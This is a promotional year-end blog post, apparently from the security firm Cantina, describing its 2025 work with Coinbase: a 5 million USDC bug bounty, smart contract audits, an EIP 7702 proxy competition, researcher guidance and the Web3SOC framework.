We could not close 2025 without highlighting the security work Coinbase put into practice this year.
For millions of people and thousands of organizations, Coinbase is the default way to access Web3. It is a publicly listed, regulated organization that operates at global scale, with wallets, custody, Base, and onchain products used every day by retail users, developers, and institutions. When someone holds assets with Coinbase or interacts with Base smart contracts, they are relying on Coinbase’s security model as much as the user interface.
This year, Coinbase and Cantina collaborated on an onchain security program that reflects that responsibility. The work included launching a 5 million USDC bug bounty focused on Coinbase’s onchain products and Base smart contracts, a series of structured smart contract audits, a targeted competition, public guidance for security researchers, and a visible role for Coinbase as a key collaborator on the Web3SOC institutional readiness framework.
The objective is straightforward. Coinbase wants its position as the safest entry point into Web3 to continue to be backed by clear, verifiable, and ongoing security work.
Coinbase’s evolution into onchain infrastructure
Coinbase began as a simple way to buy and sell Bitcoin and has grown into one of the primary infrastructure providers in the Web3 ecosystem.
Today, the organization operates across the onchain ecosystem, for example:
- Consumer products that allow users to buy, sell, store, and send digital assets.
- Wallet and custody infrastructure for individuals, organizations, and institutions.
- Base, an open stack that combines a secure, low-cost Ethereum Layer 2 chain, a social and financial app, and developer tools that work together to unlock a global onchain economy.
- Institutional offerings that integrate onchain rewards and lending into existing financial and corporate workflows.
This evolution means Coinbase’s onchain security investments support a broad set of participants at once, including retail users, developers, trading organizations, protocol organizations, and institutional clients. When Coinbase strengthens a Base contract, a staking system, or a wallet integration, the same higher standard applies across the stack.
The security collaboration with Cantina is designed around that scale. Together we focus on smart contract security as core infrastructure, in the same category as uptime, performance, and regulatory compliance, so Coinbase users and partners can better rely on consistent protections wherever they interact with Coinbase’s products.
Security as a core product commitment
Coinbase maintains dedicated engineering and security groups, follows formal review and change management processes, and invests heavily in secure software development practices.
In 2025, more of this discipline became visible to the broader Web3 security community through:
- A large onchain bug bounty program with transparent reward tiers.
- Recurring smart contract audits of key components across the Coinbase and Base stack.
- Public communication on what Coinbase considers a valid proof of concept and how security submissions are evaluated.
- Collaboration on Web3SOC
These steps show how Coinbase translates its brand as a safe gateway into specific, observable security practices around wallets, onchain products, and Base.
Coinbase x Cantina in 2025
5 million USDC onchain bug bounty
On 8 July 2025, Coinbase launched a new onchain bug bounty program on Cantina focused on Coinbase’s onchain products and Base smart contracts.
The key parameters are clear:
- Maximum reward of five million USDC for critical severity issues.
- Maximum reward of five hundred thousand USDC for high severity issues.
- Scope that includes Base, wrapped assets like cbETH, cbBTC, Basenames, staking contracts, DEX aggregators, and selected new onchain acquisitions.
- Open participation with no deposits, staking, or financial barriers for researchers.
Each submission is evaluated with production context in mind. Coinbase’s security organization, working together with Cantina’s triage specialists, reviews each proof of concept for reproducibility, impact on real deployments, and accurate severity classification.
This structure signals that Coinbase expects continuous external testing of its onchain infrastructure and is prepared to compensate impactful discoveries at a level that matches the importance of these systems.
"Coinbase’s $5M bug bounty program underscores our commitment to securing diverse onchain products through collaboration with the global research community. Partnering with Cantina, we aim to build trust and resilience in Web3 by fostering transparency and proactive engagement."
- Anmol Malhotra, Head of Product Security and Blockchain Security at Coinbase.
Structured smart contract security audits and competition
Alongside the bug bounty, Coinbase and Cantina ran a series of collaborative security reviews and one focused competition during 2025. These engagements covered smart contracts and systems that support significant user and developer activity.
These audits included:
- Coinbase: SignatureDiscountValidator.sol
- Coinbase Verified Pools V2.
- Base flywheel components.
- Zora and Coinbase Creator Coin integration logic.
- Coinbase Flywheel Part 3.
- BaseNames smart contracts.
- The Solady smart contract library as used in Coinbase scope.
- The op enclave component.
In addition, Coinbase hosted a security competition focused on the EIP 7702 Proxy, with 20,000 USDC in rewards. This competition concentrated research attention on a specific account and transaction pattern that is relevant for future wallet models and smart account behavior.
These audits and the competition ran inside Cantina’s structured process. Scope and documentation were defined together with Coinbase, security researchers received the context
needed to build realistic tests, and findings were assessed based on exploitability and impact in production environments.
The overall pattern is consistent. Coinbase places high impact components into formal security review and keeps those components in the live bug bounty scope, so that testing continues as products evolve.
Enabling researchers with public guidance
The Coinbase and Cantina X Space on proof of concept quality was designed to make the bounty more effective for both Coinbase and the researcher community.
In that session, Alexis Williams, Staff Blockchain Security Engineer at Coinbase, and Harikrishnan Mulackal, CEO of Cantina, shared practical guidance on:
- How Coinbase analyzes proofs of concept and ties them to real systems.
- Why deterministic, reproducible tests using Foundry forks and realistic assumptions are required.
- Common errors that lead to invalid findings, such as misuse of cheat codes or test environments that remove critical context.
- How to write a concise report that describes the vulnerability, the exploit steps, and the post exploit state in a way that security and engineering organizations can act on.
By publishing these expectations, Coinbase gives independent researchers the same reference points that internal security engineers use. Combined with the open, deposit free program design, this approach lowers the barrier for new researchers and helps to improve the overall quality of submissions.
The result is a more efficient security pipeline. Researchers can focus on findings that matter in production, Coinbase receives clearer and more reproducible reports, and valid issues progress more quickly from discovery to remediation within Coinbase’s engineering and security workflows.
Coinbase and Web3SOC
In July 2025, Coinbase became a key collaborator on Web3SOC, the institutional readiness framework Cantina is building together with leading Web3 organizations.
Web3SOC provides a structured way to evaluate whether an onchain organization is prepared for institutional scale participation. The framework covers operational practices, financial controls, security processes, and regulatory alignment. It is built for two main use cases:
- Organizations that want to assess their current level of readiness and identify concrete areas for improvement.
- Institutions that need a consistent, technically grounded framework for diligence across multiple Web3 partners and infrastructure providers.
Coinbase contributes a broad and practical perspective to this work. As a public company, a major exchange, a wallet provider, an incubator of Base, and a security conscious infrastructure partner, Coinbase understands how control environments, incident response, and segregation of duties need to function in real onchain systems.
For institutions evaluating Web3 infrastructure, Coinbase’s role in Web3SOC is an important signal. The organization is not only operating secure products and wallets, it is also contributing directly to the standards that will govern institutional engagement with Web3.
What 2025 means for 2026
The 2025 Coinbase and Cantina security program illustrates a model that other large Web3 infrastructure organizations can adopt.
Organizations building or expanding onchain products in 2026 will be evaluated against this landscape. Those that match the visibility, scale, and structure of Coinbase’s will be in a stronger position when stakeholders ask how onchain risk is being managed.
Coinbase’s path shows how a global exchange and wallet provider can describe safety in concrete terms that developers, users, and institutions can understand. Public rewards, structured audits, clear expectations for researchers, and institutional frameworks all reinforce its role as the safest and most trusted entry point into Web3.
Closing
As more organizations adopt this level of transparency described above, and structure around onchain security, the overall standard for the ecosystem will rise. Cantina’s role is to help design, operate, and refine these programs so they deliver reliable protection under real conditions.
If you are planning a large scale bug bounty, building an institutional onchain security program, or preparing for a security readiness, contact our organization and we will help you scope, test, and harden your security model.